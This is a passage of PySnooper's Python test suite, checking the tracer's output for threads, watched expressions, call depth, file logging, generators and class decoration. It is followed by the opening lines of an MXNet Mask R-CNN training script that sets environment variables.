VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_multi_thread_info():
@pysnooper.snoop(thread_info=True)
def my_function(foo):
x = 7
y = 8
return y + x
def parse_call_content(line):
return line.split('{event:9} '.format(event='call'))[-1]
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
my_function('baba')
t1 = threading.Thread(target=my_function, name="test123",args=['bubu'])
t1.start()
t1.join()
t1 = threading.Thread(target=my_function, name="bibi",args=['bibi'])
t1.start()
t1.join()
output = output_capturer.string_io.getvalue()
calls = [line for line in output.split("\n") if "call" in line]
main_thread = calls[0]
assert parse_call_content(main_thread) == parse_call_content(calls[1])
assert parse_call_content(main_thread) == parse_call_content(calls[2])
thread_info_regex = '([0-9]+-{name}+[ ]+)'
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
VariableEntry('foo', value_regex="u?'bubu'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(
name="test123")),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(
name="test123")),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(
name="test123")),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(
name="test123")),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
VariableEntry('foo', value_regex="u?'bibi'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(name='bibi')),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(name='bibi')),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(name='bibi')),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(name='bibi')),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_callable():
string_io = io.StringIO()
def write(msg):
string_io.write(msg)
@pysnooper.snoop(write)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_watch():
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@pysnooper.snoop(watch=(
'foo.x',
'io.__name__',
'len(foo.__dict__["x"] * "abc")',
))
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
VariableEntry('io.__name__', "'io'"),
CallEntry('def my_function():'),
LineEntry('foo = Foo()'),
VariableEntry('foo'),
VariableEntry('foo.x', '2'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '6'),
LineEntry(),
VariableEntry('i', '0'),
LineEntry(),
VariableEntry('foo.x', '4'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '12'),
LineEntry(),
VariableEntry('i', '1'),
LineEntry(),
VariableEntry('foo.x', '16'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '48'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('None')
)
)
def test_watch_explode():
class Foo:
def __init__(self, x, y):
self.x = x
self.y = y
@pysnooper.snoop(watch_explode=('_d', '_point', 'lst + []'))
def my_function():
_d = {'a': 1, 'b': 2, 'c': 'ignore'}
_point = Foo(x=3, y=4)
lst = [7, 8, 9]
lst.append(10)
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
CallEntry('def my_function():'),
LineEntry(),
VariableEntry('_d'),
VariableEntry("_d['a']", '1'),
VariableEntry("_d['b']", '2'),
VariableEntry("_d['c']", "'ignore'"),
LineEntry(),
VariableEntry('_point'),
VariableEntry('_point.x', '3'),
VariableEntry('_point.y', '4'),
LineEntry(),
VariableEntry('lst'),
VariableEntry('(lst + [])[0]', '7'),
VariableEntry('(lst + [])[1]', '8'),
VariableEntry('(lst + [])[2]', '9'),
VariableEntry('lst + []'),
LineEntry(),
VariableEntry('lst'),
VariableEntry('(lst + [])[3]', '10'),
VariableEntry('lst + []'),
ReturnEntry(),
ReturnValueEntry('None')
)
)
def test_variables_classes():
class WithSlots(object):
__slots__ = ('x', 'y')
def __init__(self):
self.x = 3
self.y = 4
@pysnooper.snoop(watch=(
pysnooper.Keys('_d', exclude='c'),
pysnooper.Attrs('_d'), # doesn't have attributes
pysnooper.Attrs('_s'),
pysnooper.Indices('_lst')[-3:],
))
def my_function():
_d = {'a': 1, 'b': 2, 'c': 'ignore'}
_s = WithSlots()
_lst = list(range(1000))
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('WithSlots'),
CallEntry('def my_function():'),
LineEntry(),
VariableEntry('_d'),
VariableEntry("_d['a']", '1'),
VariableEntry("_d['b']", '2'),
LineEntry(),
VariableEntry('_s'),
VariableEntry('_s.x', '3'),
VariableEntry('_s.y', '4'),
LineEntry(),
VariableEntry('_lst'),
VariableEntry('_lst[997]', '997'),
VariableEntry('_lst[998]', '998'),
VariableEntry('_lst[999]', '999'),
ReturnEntry(),
ReturnValueEntry('None')
)
)
def test_single_watch_no_comma():
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@pysnooper.snoop(watch='foo')
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
CallEntry('def my_function():'),
LineEntry('foo = Foo()'),
VariableEntry('foo'),
LineEntry(),
VariableEntry('i', '0'),
LineEntry(),
LineEntry(),
VariableEntry('i', '1'),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('None')
)
)
def test_long_variable():
@pysnooper.snoop()
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{100}$)\[0, 1, 2, .*\.\.\..*, 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex)
)
)
def test_long_variable_with_custom_max_variable_length():
@pysnooper.snoop(max_variable_length=200)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{200}$)\[0, 1, 2, .*\.\.\..*, 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex)
)
)
def test_long_variable_with_infinite_max_variable_length():
@pysnooper.snoop(max_variable_length=None)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{1000,100000}$)\[0, 1, 2, [^.]+ 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex)
)
)
def test_repr_exception():
class Bad(object):
def __repr__(self):
1 / 0
@pysnooper.snoop()
def my_function():
bad = Bad()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Bad'),
CallEntry('def my_function():'),
LineEntry('bad = Bad()'),
VariableEntry('bad', value='REPR FAILED'),
ReturnEntry(),
ReturnValueEntry('None')
)
)
def test_depth():
string_io = io.StringIO()
def f4(x4):
result4 = x4 * 2
return result4
def f3(x3):
result3 = f4(x3)
return result3
def f2(x2):
result2 = f3(x2)
return result2
@pysnooper.snoop(string_io, depth=3)
def f1(x1):
result1 = f2(x1)
return result1
result = f1(10)
assert result == 20
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f1(x1):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f2(x2):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f3(x3):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
)
)
def test_method_and_prefix():
class Baz(object):
def __init__(self):
self.x = 2
@pysnooper.snoop(watch=('self.x',), prefix='ZZZ')
def square(self):
foo = 7
self.x **= 2
return self
baz = Baz()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = baz.square()
assert result is baz
assert result.x == 4
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(prefix='ZZZ'),
VariableEntry('self', prefix='ZZZ'),
VariableEntry('self.x', '2', prefix='ZZZ'),
CallEntry('def square(self):', prefix='ZZZ'),
LineEntry('foo = 7', prefix='ZZZ'),
VariableEntry('foo', '7', prefix='ZZZ'),
LineEntry('self.x **= 2', prefix='ZZZ'),
VariableEntry('self.x', '4', prefix='ZZZ'),
LineEntry(prefix='ZZZ'),
ReturnEntry(prefix='ZZZ'),
ReturnValueEntry(prefix='ZZZ'),
),
prefix='ZZZ'
)
def test_file_output():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
@pysnooper.snoop(path)
def my_function(_foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('_foo', value_regex="u?'baba'"),
CallEntry('def my_function(_foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_confusing_decorator_lines():
string_io = io.StringIO()
def empty_decorator(function):
return function
@empty_decorator
@pysnooper.snoop(string_io,
depth=2) # Multi-line decorator for extra confusion!
@empty_decorator
@empty_decorator
def my_function(foo):
x = lambda bar: 7
y = 8
return y + x(foo)
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry(),
LineEntry(),
# inside lambda
VariableEntry('bar', value_regex="u?'baba'"),
CallEntry('x = lambda bar: 7'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('7'),
# back in my_function
ReturnEntry(),
ReturnValueEntry('15'),
)
)
def test_lambda():
string_io = io.StringIO()
my_function = pysnooper.snoop(string_io)(lambda x: x ** 2)
result = my_function(7)
assert result == 49
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '7'),
CallEntry(source_regex='^my_function = pysnooper.*'),
LineEntry(source_regex='^my_function = pysnooper.*'),
ReturnEntry(source_regex='^my_function = pysnooper.*'),
ReturnValueEntry('49'),
)
)
def test_unavailable_source():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder, \
mini_toolbox.TempSysPathAdder(str(folder)):
module_name = 'iaerojajsijf'
python_file_path = folder / ('%s.py' % (module_name,))
content = textwrap.dedent(u'''
import pysnooper
@pysnooper.snoop()
def f(x):
return x
''')
with python_file_path.open('w') as python_file:
python_file.write(content)
module = __import__(module_name)
python_file_path.unlink()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = getattr(module, 'f')(7)
assert result == 7
output = output_capturer.output
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(stage='starting'),
CallEntry('SOURCE IS UNAVAILABLE'),
LineEntry('SOURCE IS UNAVAILABLE'),
ReturnEntry('SOURCE IS UNAVAILABLE'),
ReturnValueEntry('7'),
)
)
def test_no_overwrite_by_default():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
with path.open('w') as output_file:
output_file.write(u'lala')
@pysnooper.snoop(str(path))
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert output.startswith('lala')
shortened_output = output[4:]
assert_output(
shortened_output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_overwrite():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
with path.open('w') as output_file:
output_file.write(u'lala')
@pysnooper.snoop(str(path), overwrite=True)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert 'lala' not in output
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_error_in_overwrite_argument():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
with pytest.raises(Exception, match='can only be used when writing'):
@pysnooper.snoop(overwrite=True)
def my_function(foo):
x = 7
y = 8
return y + x
def test_needs_parentheses():
assert not needs_parentheses('x')
assert not needs_parentheses('x.y')
assert not needs_parentheses('x.y.z')
assert not needs_parentheses('x.y.z[0]')
assert not needs_parentheses('x.y.z[0]()')
assert not needs_parentheses('x.y.z[0]()(3, 4 * 5)')
assert not needs_parentheses('foo(x)')
assert not needs_parentheses('foo(x+y)')
assert not needs_parentheses('(x+y)')
assert not needs_parentheses('[x+1 for x in ()]')
assert needs_parentheses('x + y')
assert needs_parentheses('x * y')
assert needs_parentheses('x and y')
assert needs_parentheses('x if z else y')
def test_with_block():
# Testing that a single Tracer can handle many mixed uses
snoop = pysnooper.snoop()
def foo(x):
if x == 0:
bar1(x)
qux()
return
with snoop:
# There should be line entries for these three lines,
# no line entries for anything else in this function,
# but calls to all bar functions should be traced
foo(x - 1)
bar2(x)
qux()
int(4)
bar3(9)
return x
@snoop
def bar1(_x):
qux()
@snoop
def bar2(_x):
qux()
@snoop
def bar3(_x):
qux()
def qux():
return 9 # not traced, mustn't show up
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = foo(2)
assert result == 2
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
# In first with
SourcePathEntry(),
VariableEntry('x', '2'),
VariableEntry('bar1'),
VariableEntry('bar2'),
VariableEntry('bar3'),
VariableEntry('foo'),
VariableEntry('qux'),
VariableEntry('snoop'),
LineEntry('foo(x - 1)'),
# In with in recursive call
VariableEntry('x', '1'),
VariableEntry('bar1'),
VariableEntry('bar2'),
VariableEntry('bar3'),
VariableEntry('foo'),
VariableEntry('qux'),
VariableEntry('snoop'),
LineEntry('foo(x - 1)'),
# Call to bar1 from if block outside with
VariableEntry('_x', '0'),
VariableEntry('qux'),
CallEntry('def bar1(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
# In with in recursive call
LineEntry('bar2(x)'),
# Call to bar2 from within with
VariableEntry('_x', '1'),
VariableEntry('qux'),
CallEntry('def bar2(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
# In with in recursive call
LineEntry('qux()'),
# Call to bar3 from after with
VariableEntry('_x', '9'),
VariableEntry('qux'),
CallEntry('def bar3(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
# -- Similar to previous few sections,
# -- but from first call to foo
# In with in first call
LineEntry('bar2(x)'),
# Call to bar2 from within with
VariableEntry('_x', '2'),
VariableEntry('qux'),
CallEntry('def bar2(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
# In with in first call
LineEntry('qux()'),
# Call to bar3 from after with
VariableEntry('_x', '9'),
VariableEntry('qux'),
CallEntry('def bar3(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
),
)
def test_with_block_depth():
string_io = io.StringIO()
def f4(x4):
result4 = x4 * 2
return result4
def f3(x3):
result3 = f4(x3)
return result3
def f2(x2):
result2 = f3(x2)
return result2
def f1(x1):
str(3)
with pysnooper.snoop(string_io, depth=3):
result1 = f2(x1)
return result1
result = f1(10)
assert result == 20
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result1 = f2(x1)'),
VariableEntry(),
VariableEntry(),
CallEntry('def f2(x2):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f3(x3):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
)
)
def test_cellvars():
string_io = io.StringIO()
def f2(a):
def f3(a):
x = 0
x += 1
def f4(a):
y = x
return 42
return f4(a)
return f3(a)
def f1(a):
with pysnooper.snoop(string_io, depth=4):
result1 = f2(a)
return result1
result = f1(42)
assert result == 42
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result1 = f2(a)'),
VariableEntry(),
CallEntry('def f2(a):'),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry("a"),
CallEntry('def f3(a):'),
LineEntry(),
VariableEntry("x"),
LineEntry(),
VariableEntry("x"),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry(),
VariableEntry("x"),
CallEntry('def f4(a):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(),
ReturnEntry(),
ReturnValueEntry(),
ReturnEntry(),
ReturnValueEntry(),
)
)
def test_var_order():
string_io = io.StringIO()
def f(one, two, three, four):
five = None
six = None
seven = None
five, six, seven = 5, 6, 7
with pysnooper.snoop(string_io, depth=2):
result = f(1, 2, 3, 4)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result = f(1, 2, 3, 4)'),
VariableEntry("one", "1"),
VariableEntry("two", "2"),
VariableEntry("three", "3"),
VariableEntry("four", "4"),
CallEntry('def f(one, two, three, four):'),
LineEntry(),
VariableEntry("five"),
LineEntry(),
VariableEntry("six"),
LineEntry(),
VariableEntry("seven"),
LineEntry(),
VariableEntry("five", "5"),
VariableEntry("six", "6"),
VariableEntry("seven", "7"),
ReturnEntry(),
ReturnValueEntry(),
)
)
def test_truncate():
max_length = 20
for i in range(max_length * 2):
string = i * 'a'
truncated = truncate(string, max_length)
if len(string) <= max_length:
assert string == truncated
else:
assert truncated == 'aaaaaaaa...aaaaaaaaa'
assert len(truncated) == max_length
def test_indentation():
from .samples import indentation, recursion
assert_sample_output(indentation)
assert_sample_output(recursion)
def test_exception():
from .samples import exception
assert_sample_output(exception)
def test_generator():
string_io = io.StringIO()
original_tracer = sys.gettrace()
original_tracer_active = lambda: (sys.gettrace() is original_tracer)
@pysnooper.snoop(string_io)
def f(x1):
assert not original_tracer_active()
x2 = (yield x1)
assert not original_tracer_active()
x3 = 'foo'
assert not original_tracer_active()
x4 = (yield 2)
assert not original_tracer_active()
return
assert original_tracer_active()
generator = f(0)
assert original_tracer_active()
first_item = next(generator)
assert original_tracer_active()
assert first_item == 0
second_item = generator.send('blabla')
assert original_tracer_active()
assert second_item == 2
with pytest.raises(StopIteration) as exc_info:
generator.send('looloo')
assert original_tracer_active()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x1', '0'),
VariableEntry(),
CallEntry(),
LineEntry(),
VariableEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('0'),
# Pause and resume:
VariableEntry('x1', '0'),
VariableEntry(),
VariableEntry(),
VariableEntry(),
CallEntry(),
VariableEntry('x2', "'blabla'"),
LineEntry(),
LineEntry(),
VariableEntry('x3', "'foo'"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('2'),
# Pause and resume:
VariableEntry('x1', '0'),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
CallEntry(),
VariableEntry('x4', "'looloo'"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(None),
)
)
def test_custom_repr():
string_io = io.StringIO()
def large(l):
return isinstance(l, list) and len(l) > 5
def print_list_size(l):
return 'list(size={})'.format(len(l))
def print_dict(d):
return 'dict(keys={})'.format(sorted(list(d.keys())))
def evil_condition(x):
return large(x) or isinstance(x, dict)
@pysnooper.snoop(string_io, custom_repr=(
(large, print_list_size),
(dict, print_dict),
(evil_condition, lambda x: 'I am evil')))
def sum_to_x(x):
l = list(range(x))
a = {'1': 1, '2': 2}
return sum(l)
result = sum_to_x(10000)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '10000'),
CallEntry(),
LineEntry(),
VariableEntry('l', 'list(size=10000)'),
LineEntry(),
VariableEntry('a', "dict(keys=['1', '2'])"),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('49995000'),
)
)
def test_custom_repr_single():
string_io = io.StringIO()
@pysnooper.snoop(string_io, custom_repr=(list, lambda l: 'foofoo!'))
def sum_to_x(x):
l = list(range(x))
return 7
result = sum_to_x(10000)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '10000'),
CallEntry(),
LineEntry(),
VariableEntry('l', 'foofoo!'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('7'),
)
)
def test_disable():
string_io = io.StringIO()
def my_function(foo):
x = 7
y = 8
return x + y
with mini_toolbox.TempValueSetter((pysnooper.tracer, 'DISABLED'), True):
tracer = pysnooper.snoop(string_io)
with tracer:
result = my_function('baba')
my_decorated_function = tracer(my_function)
my_decorated_function('booboo')
output = string_io.getvalue()
assert not output
def test_class():
string_io = io.StringIO()
@pysnooper.snoop(string_io)
class MyClass(object):
def __init__(self):
self.x = 7
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.+MyClass object at"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
VariableEntry('self', value_regex="u?.+MyClass object at"),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_method(self, foo):'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + self.x'),
ReturnEntry('return y + self.x'),
ReturnValueEntry('15'),
)
)
def test_class_with_decorated_method():
string_io = io.StringIO()
def decorator(function):
def wrapper(*args, **kwargs):
result = function(*args, **kwargs)
return result
return wrapper
@pysnooper.snoop(string_io)
class MyClass(object):
def __init__(self):
self.x = 7
@decorator
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.+MyClass object at"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
VariableEntry('args', value_regex=r"\(<.+>, 'baba'\)"),
VariableEntry('kwargs', value_regex=r"\{\}"),
VariableEntry('function', value_regex="u?.+my_method at"),
CallEntry('def wrapper(*args, **kwargs):'),
LineEntry('result = function(*args, **kwargs)'),
VariableEntry('result', '15'),
LineEntry('return result'),
ReturnEntry('return result'),
ReturnValueEntry('15'),
)
)
def test_class_with_decorated_method_and_snoop_applied_to_method():
string_io = io.StringIO()
def decorator(function):
def wrapper(*args, **kwargs):
result = function(*args, **kwargs)
return result
return wrapper
@pysnooper.snoop(string_io)
class MyClass(object):
def __init__(self):
self.x = 7
@decorator
@pysnooper.snoop(string_io)
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object at"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
VariableEntry('args', value_regex=r"u?\(<.+>, 'baba'\)"),
VariableEntry('kwargs', value_regex=r"u?\{\}"),
VariableEntry('function', value_regex="u?.*my_method at"),
CallEntry('def wrapper(*args, **kwargs):'),
LineEntry('result = function(*args, **kwargs)'),
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object at"),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_method(self, foo):'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + self.x'),
ReturnEntry('return y + self.x'),
ReturnValueEntry('15'),
VariableEntry('result', '15'),
LineEntry('return result'),
ReturnEntry('return result'),
ReturnValueEntry('15'),
)
)
def test_class_with_property():
string_io = io.StringIO()
@pysnooper.snoop(string_io)
class MyClass(object):
def __init__(self):
self._x = 0
def plain_method(self):
pass
@property
def x(self):
self.plain_method()
return self._x
@x.setter
def x(self, value):
self.plain_method()
self._x = value
@x.deleter
def x(self):
self.plain_method()
del self._x
instance = MyClass()
# Do simple property operations, make sure we didn't mess up the normal behavior
result = instance.x
assert result == instance._x
instance.x = 1
assert instance._x == 1
del instance.x
with pytest.raises(AttributeError):
instance._x
# The property methods will not be traced, but their calls to plain_method will be.
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object at"),
CallEntry('def __init__(self):'),
LineEntry('self._x = 0'),
ReturnEntry('self._x = 0'),
ReturnValueEntry('None'),
# Called from getter
VariableEntry('self', value_regex="u?.*MyClass object at"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
# Called from setter
VariableEntry('self', value_regex="u?.*MyClass object at"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
# Called from deleter
VariableEntry('self', value_regex="u?.*MyClass object at"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
)
)
def test_snooping_on_class_does_not_cause_base_class_to_be_snooped():
string_io = io.StringIO()
class UnsnoopedBaseClass(object):
def __init__(self):
self.method_on_base_class_was_called = False
def method_on_base_class(self):
self.method_on_base_class_was_called = True
@pysnooper.snoop(string_io)
class MyClass(UnsnoopedBaseClass):
def method_on_child_class(self):
self.method_on_base_class()
instance = MyClass()
assert not instance.method_on_base_class_was_called
instance.method_on_child_class()
assert instance.method_on_base_class_was_called
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object at"),
CallEntry('def method_on_child_class(self):'),
LineEntry('self.method_on_base_class()'),
ReturnEntry('self.method_on_base_class()'),
ReturnValueEntry('None'),
)
)
|
train_mask_rcnn.py
|
"""Train Mask RCNN end to end."""
import argparse
import os
# disable autotune
os.environ['MXNET_CUDNN_AUTOTUNE_DEFAULT'] = '0'
os.environ['MXNET_GPU_MEM_POOL_TYPE'] = 'Round'
os.environ['MXNET_GPU_MEM_POOL_ROUND_LINEAR_CUTOFF'] = '28'
os.environ['MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD'] = '999'
os.environ['MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD'] = '25'
